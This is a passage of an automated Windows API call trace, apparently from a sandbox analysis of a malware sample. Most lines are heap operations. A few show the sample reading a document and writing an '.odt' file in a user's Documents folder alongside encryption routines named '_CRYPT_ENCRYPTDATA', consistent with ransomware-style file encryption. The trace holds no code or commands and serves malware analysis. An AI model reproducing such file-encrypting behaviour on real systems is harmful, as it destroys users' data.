dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0179.989] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\_--jwxd.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0179.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0179.992] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.992] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4505, lpOverlapped=0x0) returned 1 [0179.995] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4505) returned 0x900450 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0179.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0179.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4505) returned 0xbea018 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900450 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4505) returned 0x900450 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900450 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0179.996] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.997] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4505) returned 0x900450 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4505) returned 0xbee528 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.998] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.999] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.999] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0180.000] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0180.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0180.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0180.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0180.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0180.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.002] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0180.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0180.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 